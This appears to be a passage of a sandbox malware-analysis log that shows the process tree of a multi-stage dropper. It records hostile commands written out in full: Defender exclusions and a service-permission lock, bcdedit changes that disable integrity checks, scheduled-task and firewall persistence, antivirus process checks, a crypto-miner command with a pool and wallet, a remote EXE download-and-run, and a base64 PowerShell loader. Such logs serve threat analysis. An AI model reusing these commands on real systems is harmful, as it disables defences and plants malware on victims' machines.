- Suspicious use of AdjustPrivilegeToken
PID:540

C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe
"C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
3⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2564

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:2384

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:456

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
4⤵
- Executes dropped EXE
PID:2452

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1672

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
5⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:472

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
5⤵
PID:2932

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
6⤵
- Modifies boot configuration data using bcdedit
PID:2436

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:1704

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:2272

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
6⤵
- Modifies boot configuration data using bcdedit
PID:1072

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:692

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:3900

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
6⤵
- Modifies boot configuration data using bcdedit
PID:2356

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
6⤵
- Modifies boot configuration data using bcdedit
PID:1968

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
6⤵
- Modifies boot configuration data using bcdedit
PID:3740

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
6⤵
- Modifies boot configuration data using bcdedit
PID:3268

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
6⤵
- Modifies boot configuration data using bcdedit
PID:1788

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
6⤵
- Modifies boot configuration data using bcdedit
PID:3160

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
6⤵
- Modifies boot configuration data using bcdedit
PID:1104

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
5⤵
- Modifies boot configuration data using bcdedit
PID:3272

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
5⤵
PID:2088

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1380

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
5⤵
PID:2516

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
PID:3584

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
- Launches sc.exe
PID:1828

C:\Users\Admin\AppData\Local\Temp\Files\appdata.exe
"C:\Users\Admin\AppData\Local\Temp\Files\appdata.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2812

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Users\Admin\AppData\Local\Temp\Files\first.exe
"C:\Users\Admin\AppData\Local\Temp\Files\first.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:1872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\first.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Users\Admin\AppData\Local\Temp\Files\pinf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pinf.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2852

C:\Users\Admin\AppData\Local\Temp\2089531801.exe
C:\Users\Admin\AppData\Local\Temp\2089531801.exe
3⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
PID:2740

C:\Users\Admin\AppData\Local\Temp\350630453.exe
C:\Users\Admin\AppData\Local\Temp\350630453.exe
4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: SetClipboardViewer
PID:2692

C:\Users\Admin\AppData\Local\Temp\2191930072.exe
C:\Users\Admin\AppData\Local\Temp\2191930072.exe
5⤵
- Executes dropped EXE
PID:1776

C:\Users\Admin\AppData\Local\Temp\2528922622.exe
C:\Users\Admin\AppData\Local\Temp\2528922622.exe
5⤵
PID:2620

C:\Users\Admin\AppData\Local\Temp\1435824446.exe
C:\Users\Admin\AppData\Local\Temp\1435824446.exe
5⤵
PID:844

C:\Users\Admin\AppData\Local\Temp\2101319596.exe
C:\Users\Admin\AppData\Local\Temp\2101319596.exe
5⤵
PID:3868

C:\Users\Admin\AppData\Local\Temp\208925959.exe
C:\Users\Admin\AppData\Local\Temp\208925959.exe
4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
PID:2612

C:\Users\Admin\AppData\Local\Temp\2762831398.exe
C:\Users\Admin\AppData\Local\Temp\2762831398.exe
4⤵
PID:1556

C:\Users\Admin\AppData\Local\Temp\837431945.exe
C:\Users\Admin\AppData\Local\Temp\837431945.exe
4⤵
PID:1508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c shutdown /r
5⤵
PID:3800

C:\Windows\SysWOW64\shutdown.exe
shutdown /r
6⤵
PID:2544

C:\Users\Admin\AppData\Local\Temp\200922306.exe
C:\Users\Admin\AppData\Local\Temp\200922306.exe
4⤵
PID:2964

C:\Users\Admin\AppData\Local\Temp\1619820342.exe
C:\Users\Admin\AppData\Local\Temp\1619820342.exe
5⤵
PID:2684

C:\Users\Admin\AppData\Local\Temp\Files\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\Files\swiiii.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 256
4⤵
- Program crash
PID:2464

C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2716

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp82D6.tmp.bat""
3⤵
- Loads dropped DLL
PID:2780

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:2576

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
PID:1376

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
6⤵
- Creates scheduled task(s)
PID:2584

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
5⤵
PID:1080

C:\Users\Admin\AppData\Local\Temp\Files\riviera_tour_sochi.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\riviera_tour_sochi.pdf.exe"
2⤵
- Executes dropped EXE
PID:2204

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Riviera_tour_Sochi.pdf"
3⤵
PID:2860

C:\Users\Admin\AppData\Roaming\Violator.exe
C:\Users\Admin\AppData\Roaming\Violator.exe
3⤵
PID:2000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Jacob Jacob.bat & Jacob.bat & exit
4⤵
PID:2436

C:\Windows\SysWOW64\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:2772

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
5⤵
PID:908

C:\Windows\SysWOW64\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:3816

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
5⤵
PID:3812

C:\Windows\SysWOW64\cmd.exe
cmd /c md 14070
5⤵
PID:3452

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b 14070\Cumshot.pif + Os + Personals + Productivity + Green + Treasures 14070\Cumshot.pif
5⤵
PID:3752

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Vegas + Commentary + Dairy 14070\E
5⤵
PID:2684

C:\Users\Admin\AppData\Local\Temp\14070\Cumshot.pif
14070\Cumshot.pif 14070\E
5⤵
PID:3936

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrackFuse.url" & echo URL="C:\Users\Admin\AppData\Local\FuseTrack Solutions\TrackFuse.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrackFuse.url" & exit
6⤵
PID:2884

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Necessary" /tr "wscript 'C:\Users\Admin\AppData\Local\FuseTrack Solutions\TrackFuse.js'" /sc minute /mo 3 /F
6⤵
PID:1456

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Necessary" /tr "wscript 'C:\Users\Admin\AppData\Local\FuseTrack Solutions\TrackFuse.js'" /sc minute /mo 3 /F
7⤵
- Creates scheduled task(s)
PID:3060

C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
5⤵
- Runs ping.exe
PID:3928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 512
4⤵
- Program crash
PID:752

C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
"C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
2⤵
- Executes dropped EXE
PID:2060

C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"
2⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE
"C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/Admin/AppData/Local/Temp/Files/jeditor.exe" RUN
3⤵
PID:1964

C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
4⤵
PID:2916

C:\Users\Admin\AppData\Local\Temp\Files\up.exe
"C:\Users\Admin\AppData\Local\Temp\Files\up.exe"
2⤵
PID:3040

C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe
"C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"
2⤵
PID:2120

C:\Windows\SysWOW64\cmd.exe
"cmd" /c net use
3⤵
PID:3244

C:\Users\Admin\AppData\Local\Temp\Files\net.exe
net use
4⤵
PID:3336

C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
2⤵
PID:1716

C:\Users\Admin\AppData\Local\Temp\Files\net.exe
"C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
2⤵
PID:1308

C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe
"C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"
2⤵
PID:1588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\IEGCAAKFBA.exe"
3⤵
PID:3968

C:\Users\Admin\AppData\Local\Temp\IEGCAAKFBA.exe
"C:\Users\Admin\AppData\Local\Temp\IEGCAAKFBA.exe"
4⤵
PID:1656

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\IEGCAAKFBA.exe
5⤵
PID:1660

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
6⤵
- Runs ping.exe
PID:3100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\IIIECAAKEC.exe"
3⤵
PID:3824

C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe
"C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe"
2⤵
PID:3560

C:\Users\Admin\AppData\Local\Temp\Files\crypted_33cb9091.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted_33cb9091.exe"
2⤵
PID:3736

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 540
3⤵
- Program crash
PID:4028

C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe"
2⤵
PID:2860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 124
3⤵
- Program crash
PID:2232

C:\Users\Admin\AppData\Local\Temp\Files\Ama2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ama2.exe"
2⤵
PID:3660

C:\Users\Admin\AppData\Local\Temp\Files\alex12.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex12.exe"
2⤵
PID:3596

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1504

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2520

C:\Users\Admin\AppData\Roaming\configurationValue\fate.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\fate.exe"
4⤵
PID:1988

C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe"
4⤵
PID:1732

C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe
"C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe"
2⤵
PID:2652

C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe
C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe
3⤵
PID:3696

C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
2⤵
PID:3728

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_tlsc4ar.cmdline"
3⤵
PID:1128

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4616.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4605.tmp"
4⤵
PID:3740

C:\Windows\system32\chcp.com
"C:\Windows\system32\chcp.com" 437
3⤵
PID:2300

C:\Users\Admin\AppData\Local\Temp\Files\strt.exe
"C:\Users\Admin\AppData\Local\Temp\Files\strt.exe"
2⤵
PID:2228

C:\Users\Admin\AppData\Local\Temp\Files\yoffens_crypted_EASY.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yoffens_crypted_EASY.exe"
2⤵
PID:2788

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=yoffens_crypted_EASY.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0
3⤵
PID:3604

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3604 CREDAT:275457 /prefetch:2
4⤵
PID:3308

C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe"
2⤵
PID:3820

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
3⤵
PID:3524

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\temp.bat" "
4⤵
PID:3848

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
5⤵
PID:3340

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
5⤵
PID:3344

C:\Users\Admin\AppData\Local\Temp\Files\thost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\thost.exe"
2⤵
PID:3876

C:\Users\Admin\AppData\Local\Temp\Files\ISetup8.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ISetup8.exe"
2⤵
PID:1960

C:\Users\Admin\AppData\Local\Temp\u1ig.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1ig.0.exe"
3⤵
PID:1012

C:\Users\Admin\AppData\Local\Temp\u1ig.1.exe
"C:\Users\Admin\AppData\Local\Temp\u1ig.1.exe"
3⤵
PID:3720

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
4⤵
PID:4068

C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe"
2⤵
PID:592

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3664

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3744

C:\Users\Admin\AppData\Local\Temp\Files\dais123.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dais123.exe"
2⤵
PID:3620

C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe"
2⤵
PID:2840

C:\Users\Admin\AppData\Local\Temp\u26w.0.exe
"C:\Users\Admin\AppData\Local\Temp\u26w.0.exe"
3⤵
PID:2408

C:\Users\Admin\AppData\Local\Temp\u26w.1.exe
"C:\Users\Admin\AppData\Local\Temp\u26w.1.exe"
3⤵
PID:908

C:\Users\Admin\AppData\Local\Temp\Files\ISetup6.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ISetup6.exe"
2⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\u18k.0.exe
